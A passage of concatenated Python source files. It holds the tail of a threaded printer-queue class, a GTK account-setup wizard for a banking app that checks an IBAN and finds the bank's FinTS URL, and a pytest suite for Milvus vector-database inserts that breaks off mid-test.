self._print_queue.put(
lambda: self.print(*args, **kwargs)
)
def async_println(self, *args, **kwargs):
self._print_queue.put(
lambda: self.println(*args, **kwargs)
)
def async_feed(self, *args, **kwargs):
self._print_queue.put(
lambda: self.feed(*args, **kwargs)
)
def async_wait(self, t):
self._print_queue.put(lambda: time.sleep(t))
def batch_print(self, message):
# Since flooding the printer with a heap of data causes a backlog
# and skipped lines, we print only a handful of characters, then
# wait for a second before continuing.
# Characters and timing is from rough trial and error. They seem
# to work.
message = fmt(message, self.maxColumn)
while message:
sub, message = message[:180], message[180:]
self.async_print(sub)
self.async_wait(1)
self.async_println()
self.async_feed(3)
def cleanup(self):
self._print_queue.put(_ShutDownPrinter())
self.thread.join()
|
add_account_assistant.py | import gi, logging
gi.require_version('Gtk', '3.0')
from gi.repository import Gtk, Gdk, GObject, GLib
from schwifty import IBAN
import fints_url
from urllib.parse import urlparse
import threading
class AddAccountAssistant(Gtk.Assistant):
def __init__(self, model):
super().__init__(use_header_bar=True)
self.model = model
self.init_page_1()
self.init_page_2()
self.on_entry_changed(self.entry_iban)
self.on_entry_changed(self.entry_name)
self.on_entry_changed(self.entry_owner)
self.on_entry_changed(self.entry_url)
self.on_entry_changed(self.entry_login)
self.on_entry_changed(self.entry_pass)
self.show_all()
def do_cancel(self):
self.hide()
def do_apply(self):
self.hide() # FIXME
def do_prepare(self, page):
pass
def set_entry_status(self, entry, valid, hint):
entry.set_icon_from_icon_name(Gtk.EntryIconPosition.SECONDARY, "emblem-ok-symbolic" if valid else "emblem-important-symbolic");
# FIXME entry.set_icon_tooltip_text(Gtk.EntryIconPosition.SECONDARY, hint);
entry.set_icon_activatable(Gtk.EntryIconPosition.SECONDARY, False);
entry.set_icon_sensitive(Gtk.EntryIconPosition.SECONDARY, True);
def on_entry_changed(self, entry):
if entry is self.entry_name:
if not len(entry.get_text()):
self.set_entry_status(entry, False, "Please enter an account name.")
self.page_1_name = False
else:
self.set_entry_status(entry, True, None)
self.page_1_name = True
elif entry is self.entry_owner:
if not len(entry.get_text()):
self.set_entry_status(entry, False, "Please enter an account owner.")
self.page_1_owner = False
else:
self.set_entry_status(entry, True, None)
self.page_1_owner = True
elif entry is self.entry_iban:
iban = None
try:
iban = IBAN(entry.get_text())
self.set_entry_status(entry, True, None)
self.page_1_iban = True
except:
self.set_entry_status(entry, False, "Please enter an account owner.")
self.page_1_iban = False
if iban:
threading.Thread(target=self.async_fints_url_finder, args=(iban,), daemon=True).start()
elif entry is self.entry_url:
try:
url = urlparse(entry.get_text() if entry.get_text() else entry.get_placeholder_text())
self.set_entry_status(entry, True, None)
except:
self.set_entry_status(entry, False, "Please enter the banks FinTS URL.")
elif entry is self.entry_login:
if not entry.get_text():
self.set_entry_status(entry, False, "Please enter FinTS login name.")
else:
self.set_entry_status(entry, True, None)
elif entry is self.entry_pass:
if not entry.get_text():
self.set_entry_status(entry, False, "Please enter FinTS password.")
else:
self.set_entry_status(entry, True, None)
self.set_page_complete(self.get_nth_page(0), self.page_1_name and self.page_1_owner and self.page_1_iban)
self.set_page_complete(self.get_nth_page(1), False) #Fixme
def async_fints_url_finder(self, iban):
try:
url = fints_url.find(iban=iban)
GLib.idle_add(self.entry_url.set_placeholder_text, url)
if not self.entry_url.get_text():
GLib.idle_add(self.entry_url.set_text, url)
GLib.idle_add(self.entry_url.select_region, -1, 0)
Glib.idle_add(self.on_entry_changed, self.entry_url)
except:
pass
def init_page_1(self):
self.page_1_name = False;
self.page_1_owner = False;
self.page_1_iban = False;
grid = Gtk.Grid(row_spacing=10, column_spacing=10)
self.entry_name = Gtk.Entry(input_purpose=Gtk.InputPurpose.NAME, hexpand=True)
self.entry_name.connect('changed', self.on_entry_changed)
self.entry_owner = Gtk.Entry(input_purpose=Gtk.InputPurpose.NAME, hexpand=True)
self.entry_owner.connect('changed', self.on_entry_changed)
self.entry_iban = Gtk.Entry(input_purpose=Gtk.InputPurpose.FREE_FORM, hexpand=True)
self.entry_iban.connect('changed', self.on_entry_changed)
grid.attach(Gtk.Label(label='''
To create an account please fill in the account details.
Account name and owner name can be arbitarly choosen by you.
''', xalign=0, hexpand=True), 1, 0, 1, 1)
grid.attach(Gtk.Label(label="Account Name", xalign=1.0), 0, 1, 1, 1)
grid.attach(self.entry_name, 1, 1, 1, 1)
grid.attach(Gtk.Label(label="Owner Name", xalign=1.0), 0, 2, 1, 1)
grid.attach(self.entry_owner, 1, 2, 1, 1)
grid.attach(Gtk.Label(label='''
Account name and owner name can be arbitarly choosen by you.
Saldo automatically determines the bank from the accounts IBAN.
''', xalign=0, hexpand=True), 1, 3, 1, 1)
grid.attach(Gtk.Label(label="IBAN", xalign=1.0), 0, 4, 1, 1)
grid.attach(self.entry_iban, 1, 4, 1, 1)
self.append_page(grid)
def init_page_2(self):
grid = Gtk.Grid(row_spacing=10, column_spacing=10)
self.entry_url = Gtk.Entry(input_purpose=Gtk.InputPurpose.URL, hexpand=True)
self.entry_url.connect('changed', self.on_entry_changed)
self.entry_login = Gtk.Entry(input_purpose=Gtk.InputPurpose.FREE_FORM, hexpand=True)
self.entry_login.connect('changed', self.on_entry_changed)
self.entry_pass = Gtk.Entry(input_purpose=Gtk.InputPurpose.PASSWORD, hexpand=True)
self.entry_pass.connect('changed', self.on_entry_changed)
grid.attach(Gtk.Label(label="Please fill in the banks connection details.", xalign=0), 0, 0, 2, 1)
grid.attach(Gtk.Label(label="FinTS URL", xalign=1.0), 0, 1, 1, 1)
grid.attach(self.entry_url, 1, 1, 1, 1)
grid.attach(Gtk.Label(label="Login", xalign=1.0), 0, 2, 1, 1)
grid.attach(self.entry_login, 1, 2, 1, 1)
grid.attach(Gtk.Label(label="Password", xalign=1.0), 0, 3, 1, 1)
grid.attach(self.entry_pass, 1, 3, 1, 1)
self.append_page(grid)
|
test_insert.py | import pytest
from pymilvus import DataType, ParamError, BaseException
from utils import *
from constants import *
ADD_TIMEOUT = 60
uid = "test_insert"
field_name = default_float_vec_field_name
binary_field_name = default_binary_vec_field_name
default_single_query = {
"bool": {
"must": [
{"vector": {field_name: {"topk": 10, "query": gen_vectors(1, default_dim), "metric_type": "L2",
"params": {"nprobe": 10}}}}
]
}
}
class TestInsertBase:
"""
******************************************************************
The following cases are used to test `insert` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
# if str(connect._cmd("mode")) == "CPU":
if request.param["index_type"] in index_cpu_not_support():
pytest.skip("CPU not support index_type: ivf_sq8h")
logging.getLogger().info(request.param)
return request.param
@pytest.fixture(
scope="function",
params=gen_single_filter_fields()
)
def get_filter_field(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_single_vector_fields()
)
def get_vector_field(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_insert_with_empty_entity(self, connect, collection):
'''
target: test insert with empty entity list
method: set empty entity list as insert method params
expected: raises a ParamError exception
'''
entities = []
with pytest.raises(ParamError) as e:
connect.insert(collection, entities)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_insert_with_None(self, connect, collection):
'''
target: test insert with None
method: set None as insert method params
expected: raises a ParamError
'''
entity = None
with pytest.raises(Exception) as e:
connect.insert(collection, entity)
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_insert_collection_not_existed(self, connect):
'''
target: test insert, with collection not existed
method: insert entity into a random named collection
expected: raise a BaseException
'''
collection_name = gen_unique_str(uid)
with pytest.raises(BaseException) as e:
connect.insert(collection_name, default_entities)
@pytest.mark.level(2)
def test_insert_without_connect(self, dis_connect, collection):
'''
target: test insert entities without connection
method: create collection and insert entities in it, check if inserted successfully
expected: raise exception
'''
with pytest.raises(Exception) as e:
dis_connect.insert(collection, default_entities)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_drop_collection(self, connect, collection):
'''
target: test delete collection after insert entities
method: insert entities and drop collection
expected: has_collection false
'''
ids = connect.insert(collection, default_entity)
assert len(ids) == 1
connect.drop_collection(collection)
assert connect.has_collection(collection) == False
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_insert_flush_drop_collection(self, connect, collection):
'''
target: test drop collection after insert entities for a while
method: insert entities, sleep, and delete collection
expected: has_collection false
'''
ids = connect.insert(collection, default_entity)
assert len(ids) == 1
connect.flush([collection])
connect.drop_collection(collection)
assert connect.has_collection(collection) == False
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_create_index(self, connect, collection, get_simple_index):
'''
target: test build index insert after entities
method: insert entities and build index
expected: no error raised
'''
ids = connect.insert(collection, default_entities)
assert len(ids) == default_nb
connect.flush([collection])
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_insert_after_create_index(self, connect, collection, get_simple_index):
'''
target: test build index insert after vector
method: insert entities and build index
expected: no error raised
'''
connect.create_index(collection, field_name, get_simple_index)
ids = connect.insert(collection, default_entities)
assert len(ids) == default_nb
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_insert_search(self, connect, collection):
'''
target: test search entity after insert entity after a while
method: insert entity, sleep, and search collection
expected: no error raised
'''
ids = connect.insert(collection, default_entities)
connect.flush([collection])
connect.load_collection(collection)
res = connect.search(collection, default_single_query)
assert len(res[0]) == default_top_k
def _test_insert_segment_row_count(self, connect, collection):
nb = default_segment_row_limit + 1
res_ids = connect.insert(collection, gen_entities(nb))
connect.flush([collection])
assert len(res_ids) == nb
stats = connect.get_collection_stats(collection)
assert len(stats['partitions'][0]['segments']) == 2
for segment in stats['partitions'][0]['segments']:
assert segment['row_count'] in [default_segment_row_limit, 1]
@pytest.fixture(
scope="function",
params=[
1,
2000
],
)
def insert_count(self, request):
yield request.param
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_insert_ids(self, connect, id_collection, insert_count):
'''
target: test insert entities in collection, use customize ids
method: create collection and insert entities in it, check the ids returned and the collection length after entities inserted
expected: the length of ids and the collection row count
'''
nb = insert_count
ids = [i for i in range(nb)]
entities = gen_entities(nb)
entities[0]["values"] = ids
res_ids = connect.insert(id_collection, entities)
connect.flush([id_collection])
assert len(res_ids) == nb
assert res_ids == ids
stats = connect.get_collection_stats(id_collection)
assert stats[row_count] == nb
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_the_same_ids(self, connect, id_collection, insert_count):
'''
target: test insert vectors in collection, use customize the same ids
method: create collection and insert vectors in it, check the ids returned and the collection length after vectors inserted
expected: the length of ids and the collection row count
'''
nb = insert_count
ids = [1 for i in range(nb)]
entities = gen_entities(nb)
entities[0]["values"] = ids
res_ids = connect.insert(id_collection, entities)
connect.flush([id_collection])
assert len(res_ids) == nb
assert res_ids == ids
stats = connect.get_collection_stats(id_collection)
assert stats[row_count] == nb
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_insert_ids_fields(self, connect, get_filter_field, get_vector_field):
'''
target: test create normal collection with different fields, insert entities into id with ids
method: create collection with diff fields: metric/field_type/..., insert, and count
expected: row count correct
'''
nb = 5
filter_field = get_filter_field
vector_field = get_vector_field
collection_name = gen_unique_str("test_collection")
fields = {
"fields": [gen_primary_field(), filter_field, vector_field],
"auto_id": False
}
connect.create_collection(collection_name, fields)
ids = [i for i in range(nb)]
entities = gen_entities_by_fields(fields["fields"], nb, default_dim, ids)
logging.getLogger().info(entities)
res_ids = connect.insert(collection_name, entities)
assert res_ids == ids
connect.flush([collection_name])
stats = connect.get_collection_stats(collection_name)
assert stats[row_count] == nb
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_ids_not_match(self, connect, id_collection, insert_count):
'''
target: test insert entities in collection without ids
method: create id_collection and insert entities without
expected: exception raised
'''
nb = insert_count
with pytest.raises(Exception) as e:
entities = gen_entities(nb)
del entities[0]
connect.insert(id_collection, entities)
# TODO
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_insert_twice_ids_no_ids(self, connect, id_collection):
'''
target: check the result of insert, with params ids and no ids
method: test insert vectors twice, use customize ids first, and then use no ids
expected: BaseException raised
'''
ids = [i for i in range(default_nb)]
entities = copy.deepcopy(default_entities)
entities[0]["values"] = ids
connect.insert(id_collection, entities)
with pytest.raises(Exception) as e:
del entities[0]
connect.insert(id_collection, entities)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_not_ids(self, connect, id_collection):
'''
target: check the result of insert, with params ids and no ids
method: test insert vectors twice, use not ids first, and then use customize ids
expected: error raised
'''
entities = copy.deepcopy(default_entities)
del entities[0]
with pytest.raises(Exception) as e:
connect.insert(id_collection, entities)
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_insert_ids_length_not_match_batch(self, connect, id_collection):
'''
target: test insert vectors in collection, use customize ids, len(ids) != len(vectors)
method: create collection and insert vectors in it
expected: raise an exception
'''
ids = [i for i in range(1, default_nb)]
logging.getLogger().info(len(ids))
entities = copy.deepcopy(default_entities)
entities[0]["values"] = ids
with pytest.raises(Exception) as e:
connect.insert(id_collection, entities)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_ids_length_not_match_single(self, connect, id_collection):
'''
target: test insert vectors in collection, use customize ids, len(ids) != len(vectors)
method: create collection and insert vectors in it
expected: raise an exception
'''
ids = [i for i in range(1, default_nb)]
logging.getLogger().info(len(ids))
entity = copy.deepcopy(default_entity)
entity[0]["values"] = ids
with pytest.raises(BaseException) as e:
connect.insert(id_collection, entity)
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_insert_partition(self, connect, collection):
'''
target: test insert entities in collection created before
method: create collection and insert entities in it, with the partition_name param
expected: the collection row count equals to nq
'''
connect.create_partition(collection, default_tag)
ids = connect.insert(collection, default_entities, partition_name=default_tag)
assert len(ids) == default_nb
assert connect.has_partition(collection, default_tag)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb
# TODO
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_insert_partition_with_ids(self, connect, id_collection):
'''
target: test insert entities in collection created before, insert with ids
method: create collection and insert entities in it, with the partition_name param
expected: the collection row count equals to nq
'''
connect.create_partition(id_collection, default_tag)
ids = [i for i in range(default_nb)]
entities = gen_entities(default_nb)
entities[0]["values"] = ids
res_ids = connect.insert(id_collection, entities, partition_name=default_tag)
assert res_ids == ids
logging.getLogger().info(connect.describe_collection(id_collection))
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_insert_default_partition(self, connect, collection):
'''
target: test insert entities into default partition
method: create partition and insert info collection without tag params
expected: the collection row count equals to nb
'''
ids = connect.insert(collection, default_entities, partition_name=default_partition_name)
assert len(ids) == default_nb
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_partition_not_existed(self, connect, collection):
'''
target: test insert entities in collection created before
method: create collection and insert entities in it, with the not existed partition_name param
expected: error raised
'''
tag = gen_unique_str()
with pytest.raises(Exception) as e:
connect.insert(collection, default_entities, partition_name=tag)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_partition_repeatedly(self, connect, collection):
'''
target: test insert entities in collection created before
method: create collection and insert entities in it repeatly, with the partition_name param
expected: the collection row count equals to nq
'''
connect.create_partition(collection, default_tag)
ids = connect.insert(collection, default_entities, partition_name=default_tag)
ids = connect.insert(collection, default_entities, partition_name=default_tag)
connect.flush([collection])
res = connect.get_collection_stats(collection)
assert res[row_count] == 2 * default_nb
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_insert_dim_not_matched(self, connect, collection):
'''
target: test insert entities, the vector dimension is not equal to the collection dimension
method: the entities dimension is half of the collection dimension, check the status
expected: error raised
'''
vectors = gen_vectors(default_nb, int(default_dim) // 2)
insert_entities = copy.deepcopy(default_entities)
insert_entities[-1]["values"] = vectors
with pytest.raises(Exception) as e:
connect.insert(collection, insert_entities)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_insert_with_field_name_not_match(self, connect, collection):
'''
target: test insert entities, with the entity field name updated
method: update entity field name
expected: error raised
'''
tmp_entity = update_field_name(copy.deepcopy(default_entity), "int64", "int64new")
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.level(2)
def test_insert_with_field_type_not_match(self, connect, collection):
'''
target: test insert entities, with the entity field type updated
method: update entity field type
expected: error raised
'''
tmp_entity = update_field_type(copy.deepcopy(default_entity), "int64", DataType.FLOAT)
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.level(2)
def test_insert_with_field_value_not_match(self, connect, collection):
'''
target: test insert entities, with the entity field value updated
method: update entity field value
expected: error raised
'''
tmp_entity = update_field_value(copy.deepcopy(default_entity), DataType.FLOAT, 's')
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_insert_with_field_more(self, connect, collection):
'''
target: test insert entities, with more fields than collection schema
method: add entity field
expected: error raised
'''
tmp_entity = add_field(copy.deepcopy(default_entity))
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_insert_with_field_vector_more(self, connect, collection):
'''
target: test insert entities, with more fields than collection schema
method: add entity vector field
expected: error raised
'''
tmp_entity = add_vector_field(default_nb, default_dim)
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_insert_with_field_less(self, connect, collection):
'''
target: test insert entities, with less fields than collection schema
method: remove entity field
expected: error raised
'''
tmp_entity = remove_field(copy.deepcopy(default_entity))
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_insert_with_field_vector_less(self, connect, collection):
'''
target: test insert entities, with less fields than collection schema
method: remove entity vector field
expected: error raised
'''
tmp_entity = remove_vector_field(copy.deepcopy(default_entity))
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_insert_with_no_field_vector_value(self, connect, collection):
'''
target: test insert entities, with no vector field value
method: remove entity values of vector field
expected: error raised
'''
tmp_entity = copy.deepcopy(default_entity)
del tmp_entity[-1]["values"]
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_insert_with_no_field_vector_type(self, connect, collection):
'''
target: test insert entities, with no vector field type
method: remove entity vector field
expected: error raised
'''
tmp_entity = copy.deepcopy(default_entity)
del tmp_entity[-1]["type"]
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_insert_with_no_field_vector_name(self, connect, collection):
'''
target: test insert entities, with no vector field name
method: remove entity vector field
expected: error raised
'''
tmp_entity = copy.deepcopy(default_entity)
del tmp_entity[-1]["name"]
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
# todo fix timeout
@pytest.mark.level(2)
@pytest.mark.timeout(30)
def test_collection_insert_rows_count_multi_threading(self, args, collection):
'''
target: test collection rows_count is correct or not with multi threading
method: create collection and insert entities in it(idmap),
assert the value returned by count_entities method is equal to length of entities
expected: the count is equal to the length of entities
'''
if args["handler"] == "HTTP":
pytest.skip("Skip test in http mode")
thread_num = 8
threads = []
milvus = get_milvus(host=args["ip"], port=args["port"], handler=args["handler"], try_connect=False)
def insert(thread_i):
logging.getLogger().info("In thread-%d" % thread_i)
res_ids = milvus.insert(collection, default_entities)
milvus.flush([collection])
for i in range(thread_num):
x = threading.Thread(target=insert, args=(i,))
threads.append(x)
x.start()
for th in threads:
th.join()
stats = milvus.get_collection_stats(collection)
assert stats[row_count] == thread_num * default_nb
# TODO: unable to set config
@pytest.mark.level(2)
def _test_insert_disable_auto_flush(self, connect, collection):
'''
target: test insert entities, with disable autoflush
method: disable autoflush and insert, get entity
expected: the count is equal to 0
'''
delete_nums = 500
disable_flush(connect)
ids = connect.insert(collection, default_entities)
res = connect.get_entity_by_id(collection, ids[:delete_nums])
assert len(res) == delete_nums
assert res[0] is None
class TestInsertBinary:
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_binary_index(self, request):
request.param["metric_type"] = "JACCARD"
return request.param
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_insert_binary_entities(self, connect, binary_collection):
'''
target: test insert entities in binary collection
method: create collection and insert binary entities in it
expected: the collection row count equals to nb
'''
ids = connect.insert(binary_collection, default_binary_entities)
assert len(ids) == default_nb
connect.flush([binary_collection])
stats = connect.get_collection_stats(binary_collection)
assert stats[row_count] == default_nb
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_insert_binary_partition(self, connect, binary_collection):
'''
target: test insert entities and create partition tag
method: create collection and insert binary entities in it, with the partition_name param
expected: the collection row count equals to nb
'''
connect.create_partition(binary_collection, default_tag)
ids = connect.insert(binary_collection, default_binary_entities, partition_name=default_tag)
assert len(ids) == default_nb
assert connect.has_partition(binary_collection, default_tag)
connect.flush([binary_collection])
stats = connect.get_collection_stats(binary_collection)
assert stats[row_count] == default_nb
def test_insert_binary_multi_times(self, connect, binary_collection):
'''
target: test insert entities multi times and final flush
method: create collection and insert binary entity multi and final flush
expected: the collection row count equals to nb
'''
for i in range(default_nb):
ids = connect.insert(binary_collection, default_binary_entity)
assert len(ids) == 1
connect.flush([binary_collection])
stats = connect.get_collection_stats(binary_collection)
assert stats[row_count] == default_nb
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_insert_binary_after_create_index(self, connect, binary_collection, get_binary_index):
'''
target: test insert binary entities after build index
method: build index and insert entities
expected: no error raised
'''
connect.create_index(binary_collection, binary_field_name, get_binary_index)
ids = connect.insert(binary_collection, default_binary_entities)
assert len(ids) == default_nb
connect.flush([binary_collection])
index = connect.describe_index(binary_collection, "")
create_target_index(get_binary_index, binary_field_name)
assert index == get_binary_index
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_binary_create_index(self, connect, binary_collection, get_binary_index):
'''
target: test build index insert after vector
method: insert vector and build index
expected: no error raised
'''
ids = connect.insert(binary_collection, default_binary_entities)
assert len(ids) == default_nb
connect.flush([binary_collection])
connect.create_index(binary_collection, binary_field_name, get_binary_index)
index = connect.describe_index(binary_collection, "")
create_target_index(get_binary_index, binary_field_name)
assert index == get_binary_index
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_insert_binary_search(self, connect, binary_collection):
'''
target: test search vector after insert vector after a while
method: insert vector, sleep, and search collection
expected: no error raised
'''
ids = connect.insert(binary_collection, default_binary_entities)
connect.flush([binary_collection])
query, vecs = gen_query_vectors(binary_field_name, default_binary_entities, default_top_k, 1,
metric_type="JACCARD")
connect.load_collection(binary_collection)
res = connect.search(binary_collection, query)
logging.getLogger().debug(res)
assert len(res[0]) == default_top_k
class TestInsertAsync:
@pytest.fixture(scope="function", autouse=True)
def skip_http_check(self, args):
if args["handler"] == "HTTP":
pytest.skip("skip in http mode")
@pytest.fixture(
scope="function",
params=[
1,
1000
],
)
def insert_count(self, request):
yield request.param
def check_status(self, result):
logging.getLogger().info("In callback check status")
assert not result
def check_result(self, result):
logging.getLogger().info("In callback check results")
assert result
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_insert_async(self, connect, collection, insert_count):
'''
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
'''
nb = insert_count
future = connect.insert(collection, gen_entities(nb), _async=True)
ids = future.result()
connect.flush([collection])
assert len(ids) == nb
@pytest.mark.level(2)
def test_insert_async_false(self, connect, collection, insert_count):
'''
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
'''
nb = insert_count
ids = connect.insert(collection, gen_entities(nb), _async=False)
# ids = future.result()
connect.flush([collection])
assert len(ids) == nb
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_insert_async_callback(self, connect, collection, insert_count):
'''
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
'''
nb = insert_count
future = connect.insert(collection, gen_entities(nb), _async=True, _callback=self.check_result)
future.done()
ids = future.result()
assert len(ids) == nb
@pytest.mark.level(2)
def test_insert_async_long(self, connect, collection):
'''
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
'''
nb = 50000
future = connect.insert(collection, gen_entities(nb), _async=True, _callback=self.check_result)
ids = future.result()
assert len(ids) == nb
connect.flush([collection])
stats = connect.get_collection_stats(collection)
logging.getLogger().info(stats)
assert stats[row_count] == nb
@pytest.mark.level(2)
def test_insert_async_callback_timeout(self, connect, collection):
'''
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
'''
nb = 100000
future = connect.insert(collection, gen_entities(nb), _async=True, _callback=self.check_status, timeout=1)
with pytest.raises(Exception) as e:
result = future.result()
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_insert_async_invalid_params(self, connect):
'''
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
'''
collection_new = gen_unique_str()
future = connect.insert(collection_new, default_entities, _async=True)
future.done()
with pytest.raises(Exception) as e:
ids = future.result()
# 1339
def test_insert_async_invalid_params_raise_exception(self, connect, collection):
'''
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
'''
entities = []
future = connect.insert(collection, entities, _async=True)
future.done()
with pytest.raises(Exception) as e:
future.result()
class TestInsertMultiCollections:
"""
******************************************************************
The following cases are used to test `insert` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
logging.getLogger().info(request.param)
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in CPU mode")
return request.param
def test_insert_entity_multi_collections(self, connect):
'''
target: test insert entities
method: create 10 collections and insert entities into them in turn
expected: row count
'''
collection_num = 10
collection_list = []
for i in range(collection_num):
collection_name = gen_unique_str(uid)
collection_list.append(collection_name)
connect.create_collection(collection_name, default_fields)
ids = connect.insert(collection_name, default_entities)
connect.flush([collection_name])
assert len(ids) == default_nb
stats = connect.get_collection_stats(collection_name)
assert stats[row_count] == default_nb
for i in range(collection_num):
connect.drop_collection(collection_list[i])
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_drop_collection_insert_entity_another(self, connect, collection):
'''
target: test insert vector to collection_1 after collection_2 deleted
method: delete collection_2 and insert vector to collection_1
expected: row count equals the length of entities inserted
'''
collection_name = gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
connect.drop_collection(collection)
ids = connect.insert(collection_name, default_entity)
connect.flush([collection_name])
assert len(ids) == 1
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_create_index_insert_entity_another(self, connect, collection, get_simple_index):
'''
target: test insert vector to collection_2 after build index for collection_1
method: build index and insert vector
expected: status ok
'''
collection_name = gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
connect.create_index(collection, field_name, get_simple_index)
ids = connect.insert(collection_name, default_entity)
assert len(ids) == 1
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
connect.drop_collection(collection_name)
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_insert_entity_create_index_another(self, connect, collection, get_simple_index):
'''
target: test insert vector to collection_2 after build index for collection_1
method: build index and insert vector
expected: status ok
'''
collection_name = gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
ids = connect.insert(collection, default_entity)
connect.flush([collection])
connect.create_index(collection_name, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection_name, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
stats = connect.get_collection_stats(collection)
assert stats[row_count] == 1
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_entity_sleep_create_index_another(self, connect, collection, get_simple_index):
'''
target: test insert vector to collection_2 after build index for collection_1 for a while
method: build index and insert vector
expected: status ok
'''
collection_name = gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
ids = connect.insert(collection, default_entity)
connect.flush([collection])
connect.create_index(collection_name, field_name, get_simple_index)
stats = connect.get_collection_stats(collection)
assert stats[row_count] == 1
@pytest.mark.timeout(ADD_TIMEOUT)
def test_search_entity_insert_entity_another(self, connect, collection):
'''
target: test insert entity to collection_1 after search collection_2
method: search collection and insert entity
expected: status ok
'''
collection_name = gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
connect.load_collection(collection)
res = connect.search(collection, default_single_query)
assert len(res[0]) == 0
connect.insert(collection_name, default_entity)
connect.flush([collection_name])
stats = connect.get_collection_stats(collection_name)
assert stats[row_count] == 1
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_insert_entity_search_entity_another(self, connect, collection):
'''
target: test insert entity to collection_1 after search collection_2
